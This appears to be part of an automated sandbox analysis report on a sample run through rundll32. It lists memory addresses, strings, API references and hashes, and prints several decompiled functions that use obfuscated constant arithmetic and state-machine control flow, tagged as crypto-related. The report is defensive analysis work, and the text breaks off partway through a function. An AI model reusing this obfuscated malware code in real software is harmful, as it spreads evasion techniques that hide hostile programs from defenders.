0x002069c8
0x002069cd
0x002069d5
0x002069dd
0x002069e5
0x002069ed
0x002069f5
0x002069fd
0x00206a0b
0x00206a10
0x00206a16
0x00206a1e
0x00206a26
0x00206a32
0x00206a37
0x00206a3d
0x00206a42
0x00206a4a
0x00206a52
0x00206a5a
0x00206a5f
0x00206a67
0x00206a6f
0x00206a77
0x00206a7f
0x00206a87
0x00206a8c
0x00206a94
0x00206a9c
0x00206aa4
0x00206aac
0x00206ab4
0x00206abc
0x00206ac4
0x00206acc
0x00206ad4
0x00206adc
0x00206ae4
0x00206aec
0x00206af1
0x00206af9
0x00206b01
0x00206b09
0x00206b11
0x00206b1a
0x00206b1d
0x00206b21
0x00206b29
0x00206b31
0x00206b39
0x00206b41
0x00206b49
0x00206b51
0x00206b59
0x00206b61
0x00206b69
0x00206b71
0x00206b79
0x00206b81
0x00206b8b
0x00206b90
0x00206b95
0x00206b9d
0x00206ba5
0x00206bad
0x00206bb5
0x00206bbd
0x00206bc5
0x00206bd2
0x00206bd6
0x00206bde
0x00206be6
0x00206bee
0x00206bf6
0x00206bfe
0x00206c06
0x00206c0e
0x00206c16
0x00206c1e
0x00206c1e
0x00206c1e
0x00206c23
0x00000000
0x00206c28
0x00206c28
0x00206c2e
0x00206d35
0x00206d36
0x00206d39
0x00206d3f
0x00206d43
0x00206d45
0x00206d4e
0x00206d53
0x00206d58
0x00206d5d
0x00000000
0x00206d5d
0x00206d47
0x00206d22
0x00206d22
0x00206cca
0x00206cca
0x00206ccf
0x00206ccf
0x00000000
0x00206ccf
0x00206c3a
0x00000000
0x00206d96
0x00206c42
0x00206d70
0x00206d73
0x00206d78
0x00206d7b
0x00000000
0x00206d7b
0x00206c4e
0x00206d17
0x00206d1d
0x00000000
0x00206d1d
0x00206c5a
0x00206cd9
0x00206ceb
0x00206cf0
0x00206cf3
0x00206cf6
0x00206cfd
0x00206d02
0x00206d07
0x00000000
0x00206d07
0x00206c5e
0x00206c93
0x00206cb0
0x00206cb5
0x00206cb8
0x00206cbb
0x00206cc2
0x00206cc7
0x00000000
0x00206cc7
0x00206c62
0x00000000
0x00000000
0x00206c77
0x00206c7c
0x00206c7f
0x00206c89
0x00206c8e
0x00000000
0x00206d62
0x00206d62
0x00206d62
0x00000000
0x00206c28
0x00206c28

Strings

y7X, xrefs: 00206B71
k<, xrefs: 00206A1E
"=, xrefs: 00206B79
GX, xrefs: 00206A67
?j, xrefs: 00206B39
.V, xrefs: 00206AD4
'&/U, xrefs: 00206AB4

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "=$'&/U$.V$?j$GX$y7X$k<
API String ID: 0-2482092835
Opcode ID: 069629284327df9c415661b5ce3ccbcefe867f238cec898fb4c929947c54ac87
Instruction ID: 8bda63f65dd82eefffbfd97e3853e6fa64c3ca66f14d3d4ff83788292aa54869
Opcode Fuzzy Hash: 069629284327df9c415661b5ce3ccbcefe867f238cec898fb4c929947c54ac87
Instruction Fuzzy Hash: 98A18572528341AFD358CF25C58A40BFBE1FBD4754F508A1DF48AA62A0D7B5C929CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10030B69, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10030B69(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E1000FF85(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x10030b6e
0x10030b6f
0x10030b76
0x10030c1a
0x10030c33
0x10030c39
0x10030c3e
0x10030c40
0x10030c40
0x10030c46
0x10030c49
0x10030c49
0x10030c35
0x10030c35
0x00000000
0x10030c35
0x10030b7c
0x10030b81
0x00000000
0x00000000
0x10030b87
0x10030b8c
0x10030b8e
0x10030b8e
0x10030b94
0x00000000
0x00000000
0x10030b99
0x10030bb0
0x10030bb0
0x10030bb9
0x10030bbb
0x00000000
0x00000000
0x10030bbd
0x10030bc2
0x10030bc4
0x10030bc4
0x10030bca
0x00000000
0x00000000
0x10030bcf
0x10030bed
0x10030bef
0x10030c12
0x00000000
0x10030c17
0x10030c0a
0x00000000
0x00000000
0x10030c0c
0x00000000
0x10030c0c
0x10030bd1
0x10030bd9
0x00000000
0x00000000
0x10030bdb
0x10030bde
0x10030be4
0x00000000
0x00000000
0x00000000
0x10030be6
0x10030be8
0x10030bea
0x00000000
0x10030bea
0x10030b9b
0x10030ba3
0x00000000
0x00000000
0x10030ba5
0x10030ba8
0x10030bae
0x00000000
0x00000000
0x00000000
0x10030bae
0x10030bb4
0x10030bb6
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,10030E87,00000002,00000000,?,?,?,10030E87,?,00000000), ref: 10030C02
GetLocaleInfoW.KERNEL32(?,20001004,10030E87,00000002,00000000,?,?,?,10030E87,?,00000000), ref: 10030C2B
GetACP.KERNEL32(?,?,10030E87,?,00000000), ref: 10030C40

Strings

ACP, xrefs: 10030B87
OCP, xrefs: 10030BBD

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 9307766cf3f7ef350b833b5ae7400d82360007ee80431dcbf2b3d6834d8a2fd9
Instruction ID: 7366726ca8dfa1b6abe0b51d376a4784dd352efd1aa5aec34e5175226514a72e
Opcode Fuzzy Hash: 9307766cf3f7ef350b833b5ae7400d82360007ee80431dcbf2b3d6834d8a2fd9
Instruction Fuzzy Hash: 1921A472612105AFE726CF15C960A8BB2E6EF44AE6F538164F909DF215E732DD41C350

Uniqueness

Uniqueness Score: -1.00%

Function 10030D3E, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

Part of subcall function 10023FB6: _free.LIBCMT ref: 10024018
Part of subcall function 10023FB6: _free.LIBCMT ref: 1002404E

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 10030E4A
IsValidCodePage.KERNEL32(00000000), ref: 10030E93
IsValidLocale.KERNEL32(?,00000001), ref: 10030EA2
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 10030EEA
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 10030F09

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: e652cf197484474aa77ee004c84c2ce9e9808f2ca160c0f0c27b475b69f1c72a
Instruction ID: 5d274e936d606ac0d18be7e6a8d0ab20f0ec1e67d6cbe38ebf8b77e0045353eb
Opcode Fuzzy Hash: e652cf197484474aa77ee004c84c2ce9e9808f2ca160c0f0c27b475b69f1c72a
Instruction Fuzzy Hash: 8951B171A01219AFEB02DFA5CD51AAEB3F8EF09742F010869F914EF151E771EA40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00201280, Relevance: 7.7, Strings: 6, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00201280(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t124;
				void* _t136;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				void* _t149;
				void* _t170;
				void* _t172;
				void* _t173;

				_push(_a16);
				_t169 = _a8;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t124);
				_v112 = 0x527a;
				_t173 = _t172 + 0x18;
				_v112 = _v112 + 0x9ab3;
				_t170 = 0;
				_t149 = 0x18640a1d;
				_t144 = 0x56;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0028d5a0;
				_v84 = 0xce56;
				_v84 = _v84 | 0x89224a79;
				_v84 = _v84 ^ 0x8922db02;
				_v124 = 0x8cd1;
				_v124 = _v124 ^ 0x879587c2;
				_v124 = _v124 | 0xdff4f7f6;
				_v124 = _v124 ^ 0xdff58592;
				_v80 = 0x5082;
				_v80 = _v80 * 5;
				_v80 = _v80 ^ 0x0001dd7a;
				_v100 = 0x94cc;
				_v100 = _v100 >> 1;
				_v100 = _v100 + 0xc5d3;
				_v100 = _v100 ^ 0x0001674a;
				_v104 = 0x7528;
				_v104 = _v104 | 0x4afc80c9;
				_v104 = _v104 * 0x41;
				_v104 = _v104 ^ 0x0a3a6635;
				_v108 = 0x5a30;
				_v108 = _v108 >> 6;
				_t145 = 0x51;
				_v108 = _v108 / _t144;
				_v108 = _v108 ^ 0x00000b43;
				_v128 = 0x7a75;
				_v128 = _v128 ^ 0x183e3e2b;
				_v128 = _v128 >> 0xe;
				_v128 = _v128 << 1;
				_v128 = _v128 ^ 0x0000b567;
				_v88 = 0xd0b6;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0x0003606d;
				_v92 = 0x29e5;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0x29e559c0;
				_v116 = 0xa20c;
				_v116 = _v116 / _t145;
				_v116 = _v116 << 1;
				_v116 = _v116 ^ 0x00003b63;
				_v120 = 0xbe93;
				_v120 = _v120 | 0x1a4ed6db;
				_v120 = _v120 + 0xa009;
				_v120 = _v120 + 0xfffff07c;
				_v120 = _v120 ^ 0x1a4feb5f;
				_v96 = 0x4975;
				_t146 = 0x2b;
				_v96 = _v96 * 0x31;
				_v96 = _v96 / _t146;
				_v96 = _v96 ^ 0x000025f7;
				do {
					while(_t149 != 0x1a9c3b7) {
						if(_t149 == 0xb87d72f) {
							__eflags = E0020B055(_v120, _v96, __eflags,  &_v76, _t169 + 8);
							_t170 =  !=  ? 1 : _t170;
						} else {
							if(_t149 == 0x18640a1d) {
								_t149 = 0x1a19e858;
								continue;
							} else {
								if(_t149 == 0x1a19e858) {
									E002150F2( &_v76, _v112, _v84, _v124, _a12);
									_t173 = _t173 + 0xc;
									_t149 = 0x1a9c3b7;
									continue;
								} else {
									if(_t149 != 0x2b3c78b1) {
										goto L13;
									} else {
										_t143 = E00218F11( &_v76, _v128, _v88, _t169 + 4, _v92, _v116);
										_t173 = _t173 + 0x10;
										if(_t143 != 0) {
											_t149 = 0xb87d72f;
											continue;
										}
									}
								}
							}
						}
						L16:
						return _t170;
					}
					_t136 = E00218F11( &_v76, _v80, _v100, _t169, _v104, _v108);
					_t173 = _t173 + 0x10;
					__eflags = _t136;
					if(__eflags == 0) {
						_t149 = 0x1a747795;
						goto L13;
					} else {
						_t149 = 0x2b3c78b1;
						continue;
					}
					goto L16;
					L13:
					__eflags = _t149 - 0x1a747795;
				} while (__eflags != 0);
				goto L16;
			}

0x0020128a
0x00201291
0x00201298
0x0020129f
0x002012a0
0x002012a7
0x002012a8
0x002012a9
0x002012ae
0x002012b6
0x002012b9
0x002012c8
0x002012ca
0x002012d1
0x002012d4
0x002012d8
0x002012e0
0x002012e8
0x002012f0
0x002012f8
0x00201300
0x00201308
0x00201310
0x00201318
0x00201325
0x00201329
0x00201331
0x00201339
0x0020133d
0x00201345
0x0020134d
0x00201355
0x00201362
0x00201366
0x0020136e
0x00201376
0x00201381
0x00201382
0x00201388
0x00201390
0x00201398
0x002013a0
0x002013a5
0x002013a9
0x002013b1
0x002013b9
0x002013be
0x002013c6
0x002013ce
0x002013d3
0x002013db
0x002013eb
0x002013ef
0x002013f3
0x002013fb
0x00201403
0x0020140b
0x00201413
0x0020141b
0x00201423
0x00201432
0x00201433
0x00201447
0x0020144b
0x00201453
0x00201453
0x0020145d
0x0020152a
0x0020152c
0x00201463
0x00201469
0x002014cd
0x00000000
0x0020146b
0x0020146d
0x002014be
0x002014c3
0x002014c6
0x00000000
0x0020146f
0x00201475
0x00000000
0x0020147b
0x00201493
0x00201498
0x0020149d
0x002014a3
0x00000000
0x002014a3
0x0020149d
0x00201475
0x0020146d
0x00201469
0x00201530
0x0020153b
0x0020153b
0x002014e6
0x002014eb
0x002014ee
0x002014f0
0x002014fc
0x00000000
0x002014f2
0x002014f2
0x00000000
0x002014f2
0x00000000
0x00201501
0x00201501
0x00201501
0x00000000

Strings

c;, xrefs: 002013F3
uI, xrefs: 00201423
5f:, xrefs: 00201366
zR, xrefs: 002012AE
0Z, xrefs: 0020136E
uz, xrefs: 00201390

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0Z$5f:$c;$uI$uz$zR
API String ID: 0-4070947617
Opcode ID: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
Instruction ID: 31b2a8d94c24598de24fd6b86269916026e34a3694ccef9235473648a3e00738
Opcode Fuzzy Hash: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
Instruction Fuzzy Hash: FB617571118341AFD758CE20C98691FBBF1FBC9748F80991DF19A862A1D7B9CA588F43

Uniqueness

Uniqueness Score: -1.00%

Function 002017AC, Relevance: 7.7, Strings: 6, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E002017AC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* __ecx;
				void* _t124;
				intOrPtr _t144;
				void* _t148;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				signed int* _t175;

				_push(_a20);
				_push(1);
				_push(1);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0020602B(_t124);
				_v48 = 0x839b;
				_t175 =  &(( &_v52)[7]);
				_t172 = 0;
				_t148 = 0xc9f1fee;
				_t167 = 0x65;
				_v48 = _v48 / _t167;
				_v48 = _v48 + 0xffff5433;
				_t168 = 0x4c;
				_v48 = _v48 / _t168;
				_v48 = _v48 ^ 0x035e614e;
				_v52 = 0x7a24;
				_t169 = 0x57;
				_v52 = _v52 * 0x3d;
				_v52 = _v52 / _t169;
				_v52 = _v52 | 0x143fc393;
				_v52 = _v52 ^ 0x143ff5ea;
				_v32 = 0x6195;
				_v32 = _v32 ^ 0x160f1dee;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x2c1ed936;
				_v44 = 0xc7f4;
				_v44 = _v44 + 0xffff31e5;
				_v44 = _v44 | 0xcdfc86d8;
				_v44 = _v44 + 0xffff4cbe;
				_v44 = _v44 ^ 0xffff1878;
				_v12 = 0x3e0d;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x0003ab13;
				_v24 = 0xe2a2;
				_t170 = 0x4a;
				_v24 = _v24 * 0x7d;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0006fa2b;
				_v16 = 0xd6eb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x0000394e;
				_v40 = 0x5ece;
				_v40 = _v40 * 0x43;
				_v40 = _v40 / _t170;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0x000003d1;
				_v28 = 0xdfec;
				_v28 = _v28 >> 6;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x001be0b4;
				_v20 = 0x73b;
				_v20 = _v20 ^ 0xd6615083;
				_v20 = _v20 ^ 0xd6610707;
				_v36 = 0x46b8;
				_v36 = _v36 | 0xf1966772;
				_v36 = _v36 ^ 0x374c3a36;
				_v36 = _v36 * 0x27;
				_v36 = _v36 ^ 0x4b440184;
				_v8 = 0xd697;
				_v8 = _v8 ^ 0x6f8084df;
				_v8 = _v8 ^ 0x6f807f26;
				_t171 = _v4;
				while(_t148 != 0x24e4c4b) {
					if(_t148 == 0xc9f1fee) {
						_t148 = 0x3ad8e818;
						continue;
					} else {
						if(_t148 == 0x1ffca7a2) {
							E00211AB6(1, _v12, _t148, _a20, 1, _v24, _v16, _v4, _a4, _v40, _v28, _v20);
							_t175 =  &(_t175[0xa]);
							_t148 = 0x24e4c4b;
							_t172 =  !=  ? 1 : _t172;
							continue;
						} else {
							if(_t148 == 0x34494570) {
								if(E00210729(_v32,  &_v4, _v44, _t171) != 0) {
									_t148 = 0x1ffca7a2;
									continue;
								}
							} else {
								if(_t148 != 0x3ad8e818) {
									L13:
									if(_t148 != 0x2a0664e6) {
										continue;
									}
								} else {
									_t144 = E0020F6DF(_t148);
									_t171 = _t144;
									if(_t144 != 0xffffffff) {
										_t148 = 0x34494570;
										continue;
									}
								}
							}
						}
					}
					return _t172;
				}
				E00214F7D(_v36, _v8, _v4);
				_t148 = 0x2a0664e6;
				goto L13;
			}

0x002017b3
0x002017ba
0x002017bb
0x002017bc
0x002017c0
0x002017c4
0x002017c6
0x002017cb
0x002017d3
0x002017dc
0x002017de
0x002017e5
0x002017ea
0x002017f0
0x002017fc
0x00201801
0x00201807
0x0020180f
0x0020181c
0x0020181f
0x0020182b
0x0020182f
0x00201837
0x0020183f
0x00201847
0x0020184f
0x00201853
0x0020185b
0x00201863
0x0020186b
0x00201873
0x0020187b
0x00201883
0x0020188b
0x00201890
0x00201898
0x002018a5
0x002018a6
0x002018aa
0x002018af
0x002018b7
0x002018bf
0x002018c4
0x002018cc
0x002018d9
0x002018e3
0x002018e7
0x002018ec
0x002018f4
0x002018fc
0x00201901
0x00201906
0x0020190e
0x00201916
0x0020191e
0x00201926
0x00201933
0x0020193b
0x00201948
0x0020194c
0x00201954
0x0020195c
0x00201964
0x0020196c
0x00201970
0x00201982
0x00201a1a
0x00000000
0x00201988
0x0020198a
0x00201a03
0x00201a08
0x00201a0b
0x00201a12
0x00000000
0x0020198c
0x00201992
0x002019d5
0x002019d7
0x00000000
0x002019d7
0x00201994
0x0020199a
0x00201a3b
0x00201a41
0x00000000
0x00000000
0x002019a0
0x002019a8
0x002019ad
0x002019b2
0x002019b8
0x00000000
0x002019b8
0x002019b2
0x0020199a
0x00201992
0x0020198a
0x00201a50
0x00201a50
0x00201a30
0x00201a36
0x00000000

Strings

$z, xrefs: 0020180F
N9, xrefs: 002018C4
pEI4, xrefs: 002019B8
6:L7, xrefs: 0020193B
>, xrefs: 00201883
pEI4, xrefs: 0020198C

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: >$$z$6:L7$N9$pEI4$pEI4
API String ID: 0-302225334
Opcode ID: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
Instruction ID: 1e8f1927e4ff6d51f694213e6c327e991494e05911705c35d1ae668d62f24a72
Opcode Fuzzy Hash: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
Instruction Fuzzy Hash: D16153712183429FD358CE65D88581FBBE5BFC8358F404A1DF196962A0C3B5CA6ACF83

Uniqueness

Uniqueness Score: -1.00%

Function 002120C5, Relevance: 7.6, Strings: 6, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002120C5() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				void* _t124;
				short* _t127;
				void* _t132;
				void* _t134;
				intOrPtr _t150;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t167;
				void* _t169;

				_t169 = (_t167 & 0xfffffff8) - 0x250;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t132 = 0x3ec8c14;
				_v536 = 0x37230;
				_v544 = 0xcdd0;
				_v544 = _v544 >> 7;
				_v544 = _v544 ^ 0x000074a7;
				_v572 = 0xb951;
				_v572 = _v572 + 0xffffa9df;
				_v572 = _v572 ^ 0x00005eca;
				_v584 = 0x3783;
				_v584 = _v584 >> 1;
				_t159 = 0x30;
				_v584 = _v584 / _t159;
				_v584 = _v584 ^ 0x00007df0;
				_v592 = 0x764f;
				_t160 = 0x29;
				_v592 = _v592 * 0x6c;
				_v592 = _v592 + 0xffff1483;
				_v592 = _v592 ^ 0x0030effe;
				_v580 = 0x26e4;
				_v580 = _v580 + 0xffffa17d;
				_v580 = _v580 >> 0xc;
				_v580 = _v580 ^ 0x000fb6a3;
				_v588 = 0x592d;
				_v588 = _v588 * 0x5e;
				_v588 = _v588 + 0xfffff058;
				_v588 = _v588 ^ 0x0020c0b6;
				_v576 = 0x67c6;
				_v576 = _v576 >> 4;
				_v576 = _v576 | 0x70f0481f;
				_v576 = _v576 ^ 0x70f020ed;
				_v568 = 0x5c9a;
				_v568 = _v568 ^ 0x6d262440;
				_v568 = _v568 ^ 0x6d2624e4;
				_v552 = 0x512d;
				_v552 = _v552 / _t160;
				_v552 = _v552 ^ 0x00002fd7;
				_v540 = 0x67a3;
				_v540 = _v540 + 0x741c;
				_v540 = _v540 ^ 0x0000c39d;
				_v560 = 0xac4b;
				_v560 = _v560 | 0x611015d1;
				_v560 = _v560 ^ 0x6110f087;
				_v548 = 0xff97;
				_v548 = _v548 >> 8;
				_v548 = _v548 ^ 0x000016db;
				_v556 = 0xce04;
				_t161 = 0x2b;
				_v556 = _v556 / _t161;
				_v556 = _v556 ^ 0x000048b5;
				_v564 = 0x85d6;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 ^ 0x00007642;
				do {
					while(_t132 != 0x3ec8c14) {
						if(_t132 == 0x4e3e716) {
							_push(_v572);
							_t124 = E0021889D(0x21c9b0, _v544, __eflags);
							_pop(_t134);
							_t150 =  *0x21ca2c; // 0x495cc8
							_t108 = _t150 + 0x230; // 0x660053
							E0020C680(_t108, _v592, _v580, _t134, _v588,  *0x21ca2c, _t124,  &_v524);
							_t169 = _t169 + 0x1c;
							_t127 = E00212025(_v576, _t124, _v568, _v552);
							_t132 = 0x36d909ae;
							continue;
						} else {
							if(_t132 == 0x2942dba3) {
								_t127 = E00212B16(_v548,  &_v524, E002184CC, _v564, 0,  &_v524);
							} else {
								if(_t132 != 0x36d909ae) {
									goto L8;
								} else {
									_t127 = E002028CE( &_v524, _v540, _v560);
									 *_t127 = 0;
									_t132 = 0x2942dba3;
									continue;
								}
							}
						}
						L11:
						return _t127;
					}
					_t132 = 0x4e3e716;
					L8:
					__eflags = _t132 - 0x16e8989b;
				} while (__eflags != 0);
				goto L11;
			}

0x002120cb
0x002120d1
0x002120d8
0x002120dd
0x002120e2
0x002120ea
0x002120f2
0x002120f7
0x002120ff
0x00212107
0x0021210f
0x00212117
0x0021211f
0x0021212d
0x00212132
0x00212138
0x00212145
0x0021215c
0x0021215f
0x00212163
0x0021216b
0x00212173
0x0021217b
0x00212183
0x00212188
0x00212190
0x0021219d
0x002121a1
0x002121a9
0x002121b1
0x002121b9
0x002121be
0x002121c6
0x002121ce
0x002121d6
0x002121de
0x002121e6
0x002121f6
0x002121fa
0x00212202
0x0021220a
0x00212212
0x0021221a
0x00212222
0x0021222a
0x00212232
0x0021223a
0x0021223f
0x00212247
0x00212253
0x00212256
0x0021225a
0x00212262
0x0021226a
0x0021226f
0x00212277
0x00212277
0x00212285
0x002122ae
0x002122bb
0x002122c0
0x002122dc
0x002122e6
0x002122ec
0x002122f1
0x00212302
0x00212309
0x00000000
0x00212287
0x00212289
0x00212339
0x0021228f
0x00212291
0x00000000
0x00212293
0x0021229f
0x002122a7
0x002122aa
0x00000000
0x002122aa
0x00212291
0x00212289
0x00212341
0x00212348
0x00212348
0x00212310
0x00212312
0x00212312
0x00212312
0x00000000

Strings

Bv, xrefs: 0021226F
&, xrefs: 00212173
Ov, xrefs: 00212145
-Y, xrefs: 00212190
$&m, xrefs: 002121DE
-Q, xrefs: 002121E6

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -Q$-Y$Bv$Ov$$&m$&
API String ID: 0-2434786051
Opcode ID: 89cf0febefa8aef230eda227190a13d08647439786a1c7da5107d927e5a37533
Instruction ID: 46b5f3f44f399719ef2480c08e89f70a6695035306ce81e4e979a213aeb238d8
Opcode Fuzzy Hash: 89cf0febefa8aef230eda227190a13d08647439786a1c7da5107d927e5a37533
Instruction Fuzzy Hash: D25178711183419FD368CF21C88A95FBBF1FBD4328F509A1DF585462A0C7B58999CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00206754, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00206754(intOrPtr __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				unsigned int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				void* _t96;
				signed int _t97;
				signed int _t101;
				intOrPtr _t104;
				signed int _t106;
				signed int _t107;
				void* _t108;
				signed int _t123;
				void* _t124;
				intOrPtr* _t128;
